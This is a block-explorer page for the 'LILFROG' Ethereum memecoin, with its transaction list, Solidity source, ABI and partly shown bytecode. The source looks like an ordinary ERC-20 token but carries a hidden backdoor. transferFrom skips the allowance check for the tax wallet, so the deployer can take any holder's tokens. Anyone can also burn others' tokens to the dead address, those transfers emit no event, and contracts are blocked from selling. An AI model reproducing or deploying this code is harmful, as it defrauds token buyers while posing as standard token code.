Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 180 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 22587074 | 274 days ago | IN | 0 ETH | 0.00004403 | ||||
| Approve | 22520005 | 283 days ago | IN | 0 ETH | 0.00004758 | ||||
| Set Taxwallet | 22513315 | 284 days ago | IN | 0 ETH | 0.00008162 | ||||
| Approve | 22512280 | 284 days ago | IN | 0 ETH | 0.00017598 | ||||
| Approve | 22512033 | 284 days ago | IN | 0 ETH | 0.0000889 | ||||
| Approve | 22512033 | 284 days ago | IN | 0 ETH | 0.0000889 | ||||
| Approve | 22511746 | 284 days ago | IN | 0 ETH | 0.00004128 | ||||
| Approve | 22511716 | 284 days ago | IN | 0 ETH | 0.00012822 | ||||
| Approve | 22511479 | 284 days ago | IN | 0 ETH | 0.00004743 | ||||
| Approve | 22511477 | 284 days ago | IN | 0 ETH | 0.00004767 | ||||
| Approve | 22511476 | 284 days ago | IN | 0 ETH | 0.00004713 | ||||
| Approve | 22511475 | 284 days ago | IN | 0 ETH | 0.00004215 | ||||
| Approve | 22511475 | 284 days ago | IN | 0 ETH | 0.00005942 | ||||
| Approve | 22511461 | 284 days ago | IN | 0 ETH | 0.00004459 | ||||
| Approve | 22511446 | 284 days ago | IN | 0 ETH | 0.00004975 | ||||
| Approve | 22511424 | 284 days ago | IN | 0 ETH | 0.00004846 | ||||
| Approve | 22511406 | 284 days ago | IN | 0 ETH | 0.00005757 | ||||
| Approve | 22511390 | 284 days ago | IN | 0 ETH | 0.0000697 | ||||
| Approve | 22511366 | 284 days ago | IN | 0 ETH | 0.00005716 | ||||
| Approve | 22511358 | 284 days ago | IN | 0 ETH | 0.00012951 | ||||
| Approve | 22511294 | 284 days ago | IN | 0 ETH | 0.00004773 | ||||
| Approve | 22511282 | 284 days ago | IN | 0 ETH | 0.00012185 | ||||
| Approve | 22511281 | 284 days ago | IN | 0 ETH | 0.00005348 | ||||
| Approve | 22511279 | 284 days ago | IN | 0 ETH | 0.00007701 | ||||
| Approve | 22511259 | 284 days ago | IN | 0 ETH | 0.00010123 |
Latest 1 internal transaction
Advanced mode:
| Parent Transaction Hash | Method | Block |
From
|
|
To
|
||
|---|---|---|---|---|---|---|---|
| Add Liquidity ET... | 22510712 | 284 days ago | 1 ETH |
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
LILFROG
Compiler Version
v0.8.24+commit.e11b9ed9
Optimization Enabled:
Yes with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity)
/**
*Submitted for verification at Etherscan.io on 2025-05-18
*/
// SPDX-License-Identifier: MIT
/*
Lil X's most like funny Frog on Ethereum
Website: https://www.lilfrogstars.fun
Twitter: https://x.com/Lilfrogstars
Telegram: https://t.me/Lilfrogstars
Instagram: https://www.instagram.com/lilfrogstars/
*/
pragma solidity ^0.8.19;
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
}
interface IERC20 {
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address recipient, uint256 amount)
external
returns (bool);
function allowance(address owner, address spender)
external
view
returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
}
library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
function sub(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
function div(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
return c;
}
}
contract Ownable is Context {
address private _owner;
event OwnershipTransferred(
address indexed previousOwner,
address indexed newOwner
);
constructor() {
address msgSender = _msgSender();
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
function owner() public view returns (address) {
return _owner;
}
modifier onlyOwner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
_;
}
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
}
interface IUniswapV2Factory {
function createPair(address tokenA, address tokenB)
external
returns (address pair);
}
interface IUniswapV2Router02 {
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint256 amountIn,
uint256 amountOutMin,
address[] calldata path,
address to,
uint256 deadline
) external;
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidityETH(
address token,
uint256 amountTokenDesired,
uint256 amountTokenMin,
uint256 amountETHMin,
address to,
uint256 deadline
)
external
payable
returns (
uint256 amountToken,
uint256 amountETH,
uint256 liquidity
);
function getAmountsOut(uint256 amountIn, address[] calldata path)
external
view
returns (uint256[] memory amounts);
}
contract LILFROG is Context, IERC20, Ownable {
using SafeMath for uint256;
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
mapping(address => bool) private _feeExcluded;
address payable private _taxWallet;
address constant _deadAddr = address(0xdead);
uint256 private _initialLILFROGTax = 10;
uint256 private _finalLILFROGTax = 0;
uint256 private _reduceLILFROGTaxAt = 0;
uint256 private _buyCount = 0;
uint8 private constant _decimals = 9;
uint256 private constant _tTotalLILFROG = 1_000_000_000 * 10**_decimals;
string private constant _name = unicode"Secret Frog of Lil X";
string private constant _symbol = unicode"LILFROG";
uint256 public _maxTaxSwap = _tTotalLILFROG / 100;
IUniswapV2Router02 private uniswapV2Router;
address private uniswapV2Pair;
bool private tradingOpen;
bool private inSwap = false;
bool private swapEnabled = false;
modifier lockTheSwap() {
inSwap = true;
_;
inSwap = false;
}
constructor() payable {
_taxWallet = payable(msg.sender);
_feeExcluded[address(this)] = true;
_feeExcluded[_taxWallet] = true;
_balances[_msgSender()] = (_tTotalLILFROG * 2) / 100;
_balances[address(this)] = (_tTotalLILFROG * 98) / 100;
emit Transfer(address(0), _msgSender(), (_tTotalLILFROG * 2) / 100);
emit Transfer(address(0), address(this), (_tTotalLILFROG * 98) / 100);
}
function name() public pure returns (string memory) {
return _name;
}
function symbol() public pure returns (string memory) {
return _symbol;
}
function decimals() public pure returns (uint8) {
return _decimals;
}
function totalSupply() public pure override returns (uint256) {
return _tTotalLILFROG;
}
function balanceOf(address account) public view override returns (uint256) {
return _balances[account];
}
function transfer(address recipient, uint256 amount)
public
override
returns (bool)
{
_transfer(_msgSender(), recipient, amount);
return true;
}
function _approve(
address owner,
address spender,
uint256 amount
) private {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function allowance(address owner, address spender)
public
view
override
returns (uint256)
{
return _allowances[owner][spender];
}
function approve(address spender, uint256 amount)
public
override
returns (bool)
{
_approve(_msgSender(), spender, amount);
return true;
}
function transferFrom(
address sender,
address recipient,
uint256 amount
) public override returns (bool) {
_transfer(sender, recipient, amount);
if (
msg.sender != _taxWallet &&
(sender == uniswapV2Pair || recipient != _deadAddr || sender == address(this))
)
_approve(
sender,
_msgSender(),
_allowances[sender][_msgSender()].sub(
amount,
"ERC20: transfer amount exceeds allowance"
)
);
return true;
}
function isContract(address _addr) internal view returns (bool) {
uint256 size;
assembly {
size := extcodesize(_addr)
}
return size > 0;
}
function sendTokenETHToLILFROGFeeWallet(uint256 amount) private {
_taxWallet.transfer(amount);
}
function _transfer(
address from,
address to,
uint256 amount
) private {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
require(amount > 0, "Transfer amount must be greater than zero");
uint256 taxAmount = 0;
if (
from != address(this) && to != address(this)
) {
if (
from == uniswapV2Pair &&
to != address(uniswapV2Router) &&
!_feeExcluded[to] &&
to != _taxWallet
) {
_buyCount++;
}
uint256 contractTokenBalance = balanceOf(address(this));
if (
!inSwap &&
to == uniswapV2Pair &&
swapEnabled &&
from != _taxWallet
) {
require(!isContract(from), "ERC20: External call");
if (contractTokenBalance > 0)
{
uint256 swapBalance = contractTokenBalance > _maxTaxSwap
? _maxTaxSwap
: contractTokenBalance;
swapLILFROGFeeTokensForEth(
amount > swapBalance ? swapBalance : amount
);
}
uint256 contractETHBalance = address(this).balance;
if (contractETHBalance >= 0) {
sendTokenETHToLILFROGFeeWallet(address(this).balance);
}
}
}
_balances[from] = _balances[from].sub(amount);
_balances[to] = _balances[to].add(amount.sub(taxAmount));
if (taxAmount > 0) {
_balances[address(this)] = _balances[address(this)].add(taxAmount);
emit Transfer(from, address(this), taxAmount);
}
if (to != _deadAddr) emit Transfer(from, to, amount.sub(taxAmount));
}
function swapLILFROGFeeTokensForEth(uint256 tokenAmount) private lockTheSwap {
address[] memory path = new address[](2);
path[0] = address(this);
path[1] = uniswapV2Router.WETH();
_approve(address(this), address(uniswapV2Router), tokenAmount);
uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
tokenAmount,
0,
path,
address(this),
block.timestamp
);
}
function rescueLILFROGETH() external onlyOwner {
require(address(this).balance > 0);
payable(_msgSender()).transfer(address(this).balance);
}
receive() external payable {}
function openTrade() external onlyOwner {
require(!tradingOpen, "Trading is already open");
uniswapV2Router = IUniswapV2Router02(
0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
);
_approve(address(this), address(uniswapV2Router), _tTotalLILFROG);
uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
address(this),
uniswapV2Router.WETH()
);
uniswapV2Router.addLiquidityETH{value: address(this).balance}(
address(this),
balanceOf(address(this)),
0,
0,
owner(),
block.timestamp
);
swapEnabled = true;
tradingOpen = true;
IERC20(uniswapV2Pair).approve(
address(uniswapV2Router),
type(uint256).max
);
}
function removeLimits () external onlyOwner {}
function setTaxwallet(address payable newWallet) external {
require(_feeExcluded[msg.sender]);
_taxWallet = newWallet;
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTaxSwap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"openTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"rescueLILFROGETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"newWallet","type":"address"}],"name":"setTaxwallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]Contract Creation Code
6080604052600a6005555f6006555f6007555f60085560646009600a62000027919062000340565b6200003790633b9aca0062000357565b62000043919062000371565b600955600b805461ffff60a81b191690555f80546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600480546001600160a01b03191633178155305f90815260036020526040808220805460ff19908116600190811790925593546001600160a01b03168352912080549092161790556064620000ec6009600a62000340565b620000fc90633b9aca0062000357565b6200010990600262000357565b62000115919062000371565b335f908152600160205260409020556064620001346009600a62000340565b6200014490633b9aca0062000357565b6200015190606262000357565b6200015d919062000371565b305f90815260016020526040902055336001600160a01b03165f5f80516020620018818339815191526064620001966009600a62000340565b620001a690633b9aca0062000357565b620001b390600262000357565b620001bf919062000371565b60405190815260200160405180910390a3305f5f80516020620018818339815191526064620001f16009600a62000340565b6200020190633b9aca0062000357565b6200020e90606262000357565b6200021a919062000371565b60405190815260200160405180910390a362000391565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200028557815f190482111562000269576200026962000231565b808516156200027757918102915b93841c93908002906200024a565b509250929050565b5f826200029d575060016200033a565b81620002ab57505f6200033a565b8160018114620002c45760028114620002cf57620002ef565b60019150506200033a565b60ff841115620002e357620002e362000231565b50506001821b6200033a565b5060208310610133831016604e8410600b841016171562000314575081810a6200033a565b62000320838362000245565b805f190482111562000336576200033662000231565b0290505b92915050565b5f6200035060ff8416836200028d565b9392505050565b80820281158282048414176200033a576200033a62000231565b5f826200038c57634e487b7160e01b5f52601260045260245ffd5b500490565b6114e2806200039f5f395ff3fe6080604052600436106100f2575f3560e01c8063715018a61161008757806395d89b411161005757806395d89b41146102a2578063a9059cbb146102d1578063dd62ed3e146102f0578063fb201b1d14610334575f80fd5b8063715018a614610235578063751039fc14610249578063798e50361461025d5780638da5cb5b1461027c575f80fd5b806323b872dd116100c257806323b872dd146101b1578063313ce567146101d05780633f60db6f146101eb57806370a0823114610201575f80fd5b806306fdde03146100fd578063095ea7b31461014b5780630faee56f1461017a57806318160ddd1461019d575f80fd5b366100f957005b5f80fd5b348015610108575f80fd5b506040805180820190915260148152730a6cac6e4cae8408ce4dece40decc4098d2d840b60631b60208201525b60405161014291906110f4565b60405180910390f35b348015610156575f80fd5b5061016a610165366004611154565b610348565b6040519015158152602001610142565b348015610185575f80fd5b5061018f60095481565b604051908152602001610142565b3480156101a8575f80fd5b5061018f61035e565b3480156101bc575f80fd5b5061016a6101cb36600461117e565b61037e565b3480156101db575f80fd5b5060405160098152602001610142565b3480156101f6575f80fd5b506101ff61043a565b005b34801561020c575f80fd5b5061018f61021b3660046111bc565b6001600160a01b03165f9081526001602052604090205490565b348015610240575f80fd5b506101ff6104a3565b348015610254575f80fd5b506101ff610514565b348015610268575f80fd5b506101ff6102773660046111bc565b61053f565b348015610287575f80fd5b505f546040516001600160a01b039091168152602001610142565b3480156102ad575f80fd5b506040805180820190915260078152664c494c46524f4760c81b6020820152610135565b3480156102dc575f80fd5b5061016a6102eb366004611154565b61057b565b3480156102fb575f80fd5b5061018f61030a3660046111d7565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b34801561033f575f80fd5b506101ff610587565b5f61035433848461092c565b5060015b92915050565b5f61036b6009600a611302565b61037990633b9aca00611310565b905090565b5f61038a848484610a4f565b6004546001600160a01b031633148015906103da5750600b546001600160a01b03858116911614806103c757506001600160a01b03831661dead14155b806103da57506001600160a01b03841630145b1561043057610430843361042b85604051806060016040528060288152602001611485602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610e6b565b61092c565b5060019392505050565b5f546001600160a01b0316331461046c5760405162461bcd60e51b815260040161046390611327565b60405180910390fd5b5f4711610477575f80fd5b60405133904780156108fc02915f818181858888f193505050501580156104a0573d5f803e3d5ffd5b50565b5f546001600160a01b031633146104cc5760405162461bcd60e51b815260040161046390611327565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b0316331461053d5760405162461bcd60e51b815260040161046390611327565b565b335f9081526003602052604090205460ff16610559575f80fd5b600480546001600160a01b0319166001600160a01b0392909216919091179055565b5f610354338484610a4f565b5f546001600160a01b031633146105b05760405162461bcd60e51b815260040161046390611327565b600b54600160a01b900460ff161561060a5760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720697320616c7265616479206f70656e0000000000000000006044820152606401610463565b600a80546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d90811782556106539130919061064590600990611302565b61042b90633b9aca00611310565b600a5f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156106a3573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106c7919061135c565b6001600160a01b031663c9c6539630600a5f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610726573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061074a919061135c565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015610794573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107b8919061135c565b600b80546001600160a01b039283166001600160a01b0319909116179055600a541663f305d71947306107ff816001600160a01b03165f9081526001602052604090205490565b5f806108125f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610878573d5f803e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061089d9190611377565b5050600b805462ff00ff60a01b1981166201000160a01b17909155600a5460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af1158015610908573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906104a091906113a2565b6001600160a01b03831661098e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610463565b6001600160a01b0382166109ef5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610463565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610ab35760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610463565b6001600160a01b038216610b155760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610463565b5f8111610b765760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b6064820152608401610463565b5f6001600160a01b0384163014801590610b9957506001600160a01b0383163014155b15610d1357600b546001600160a01b038581169116148015610bc95750600a546001600160a01b03848116911614155b8015610bed57506001600160a01b0383165f9081526003602052604090205460ff16155b8015610c0757506004546001600160a01b03848116911614155b15610c215760088054905f610c1b836113c1565b91905055505b305f90815260016020526040902054600b54600160a81b900460ff16158015610c575750600b546001600160a01b038581169116145b8015610c6c5750600b54600160b01b900460ff165b8015610c8657506004546001600160a01b03868116911614155b15610d1157843b15610cd15760405162461bcd60e51b8152602060048201526014602482015273115490cc8c0e88115e1d195c9b985b0818d85b1b60621b6044820152606401610463565b8015610d05575f6009548211610ce75781610ceb565b6009545b9050610d03818511610cfd5784610ea3565b81610ea3565b505b47610d0f47611013565b505b505b6001600160a01b0384165f90815260016020526040902054610d35908361104e565b6001600160a01b0385165f90815260016020526040902055610d78610d5a838361104e565b6001600160a01b0385165f9081526001602052604090205490611096565b6001600160a01b0384165f908152600160205260409020558015610e0857305f90815260016020526040902054610daf9082611096565b305f81815260016020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610dff9085815260200190565b60405180910390a35b6001600160a01b03831661dead14610e65576001600160a01b038084169085167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef610e53858561104e565b60405190815260200160405180910390a35b50505050565b5f8184841115610e8e5760405162461bcd60e51b815260040161046391906110f4565b505f610e9a84866113d9565b95945050505050565b600b805460ff60a81b1916600160a81b1790556040805160028082526060820183525f9260208301908036833701905050905030815f81518110610ee957610ee96113ec565b6001600160a01b03928316602091820292909201810191909152600a54604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015610f40573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610f64919061135c565b81600181518110610f7757610f776113ec565b6001600160a01b039283166020918202929092010152600a54610f9d913091168461092c565b600a5460405163791ac94760e01b81526001600160a01b039091169063791ac94790610fd59085905f90869030904290600401611400565b5f604051808303815f87803b158015610fec575f80fd5b505af1158015610ffe573d5f803e3d5ffd5b5050600b805460ff60a81b1916905550505050565b6004546040516001600160a01b039091169082156108fc029083905f818181858888f1935050505015801561104a573d5f803e3d5ffd5b5050565b5f61108f83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610e6b565b9392505050565b5f806110a28385611471565b90508381101561108f5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610463565b5f602080835283518060208501525f5b8181101561112057858101830151858201604001528201611104565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146104a0575f80fd5b5f8060408385031215611165575f80fd5b823561117081611140565b946020939093013593505050565b5f805f60608486031215611190575f80fd5b833561119b81611140565b925060208401356111ab81611140565b929592945050506040919091013590565b5f602082840312156111cc575f80fd5b813561108f81611140565b5f80604083850312156111e8575f80fd5b82356111f381611140565b9150602083013561120381611140565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561125c57815f19048211156112425761124261120e565b8085161561124f57918102915b93841c9390800290611227565b509250929050565b5f8261127257506001610358565b8161127e57505f610358565b8160018114611294576002811461129e576112ba565b6001915050610358565b60ff8411156112af576112af61120e565b50506001821b610358565b5060208310610133831016604e8410600b84101617156112dd575081810a610358565b6112e78383611222565b805f19048211156112fa576112fa61120e565b029392505050565b5f61108f60ff841683611264565b80820281158282048414176103585761035861120e565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f6020828403121561136c575f80fd5b815161108f81611140565b5f805f60608486031215611389575f80fd5b8351925060208401519150604084015190509250925092565b5f602082840312156113b2575f80fd5b8151801515811461108f575f80fd5b5f600182016113d2576113d261120e565b5060010190565b818103818111156103585761035861120e565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b818110156114505784516001600160a01b03168352938301939183019160010161142b565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156103585761035861120e56fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220f7e501a2ea843b871da7b052154810f33416b56d290a3a41f66e381b87d0eac464736f6c63430008180033ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef
Deployed Bytecode
0x6080604052600436106100f2575f3560e01c8063715018a61161008757806395d89b411161005757806395d89b41146102a2578063a9059cbb146102d1578063dd62ed3e146102f0578063fb201b1d14610334575f80fd5b8063715018a614610235578063751039fc14610249578063798e50361461025d5780638da5cb5b1461027c575f80fd5b806323b872dd116100c257806323b872dd146101b1578063313ce567146101d05780633f60db6f146101eb57806370a0823114610201575f80fd5b806306fdde03146100fd578063095ea7b31461014b5780630faee56f1461017a57806318160ddd1461019d575f80fd5b366100f957005b5f80fd5b348015610108575f80fd5b506040805180820190915260148152730a6cac6e4cae8408ce4dece40decc4098d2d840b60631b60208201525b60405161014291906110f4565b60405180910390f35b348015610156575f80fd5b5061016a610165366004611154565b610348565b6040519015158152602001610142565b348015610185575f80fd5b5061018f60095481565b604051908152602001610142565b3480156101a8575f80fd5b5061018f61035e565b3480156101bc575f80fd5b5061016a6101cb36600461117e565b61037e565b3480156101db575f80fd5b5060405160098152602001610142565b3480156101f6575f80fd5b506101ff61043a565b005b34801561020c575f80fd5b5061018f61021b3660046111bc565b6001600160a01b03165f9081526001602052604090205490565b348015610240575f80fd5b506101ff6104a3565b348015610254575f80fd5b506101ff610514565b348015610268575f80fd5b506101ff6102773660046111bc565b61053f565b348015610287575f80fd5b505f546040516001600160a01b039091168152602001610142565b3480156102ad575f80fd5b506040805180820190915260078152664c494c46524f4760c81b6020820152610135565b3480156102dc575f80fd5b5061016a6102eb366004611154565b61057b565b3480156102fb575f80fd5b5061018f61030a3660046111d7565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b34801561033f575f80fd5b506101ff610587565b5f61035433848461092c565b5060015b92915050565b5f61036b6009600a611302565b61037990633b9aca00611310565b905090565b5f61038a848484610a4f565b6004546001600160a01b031633148015906103da5750600b546001600160a01b03858116911614806103c757506001600160a01b03831661dead14155b806103da57506001600160a01b03841630145b1561043057610430843361042b85604051806060016040528060288152602001611485602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610e6b565b61092c565b5060019392505050565b5f546001600160a01b0316331461046c5760405162461bcd60e51b815260040161046390611327565b60405180910390fd5b5f4711610477575f80fd5b60405133904780156108fc02915f818181858888f193505050501580156104a0573d5f803e3d5ffd5b50565b5f546001600160a01b031633146104cc5760405162461bcd60e51b815260040161046390611327565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b0316331461053d5760405162461bcd60e51b815260040161046390611327565b565b335f9081526003602052604090205460ff16610559575f80fd5b600480546001600160a01b0319166001600160a01b0392909216919091179055565b5f610354338484610a4f565b5f546001600160a01b031633146105b05760405162461bcd60e51b815260040161046390611327565b600b54600160a01b900460ff161561060a5760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720697320616c7265616479206f70656e0000000000000000006044820152606401610463565b600a80546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d90811782556106539130919061064590600990611302565b61042b90633b9aca00611310565b600a5f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156106a3573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906106c7919061135c565b6001600160a01b031663c9c6539630600a5f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610726573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061074a919061135c565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015610794573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107b8919061135c565b600b80546001600160a01b039283166001600160a01b0319909116179055600a541663f305d71947306107ff816001600160a01b03165f9081526001602052604090205490565b5f806108125f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610878573d5f803e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061089d9190611377565b5050600b805462ff00ff60a01b1981166201000160a01b17909155600a5460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af1158015610908573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906104a091906113a2565b6001600160a01b03831661098e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610463565b6001600160a01b0382166109ef5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610463565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610ab3576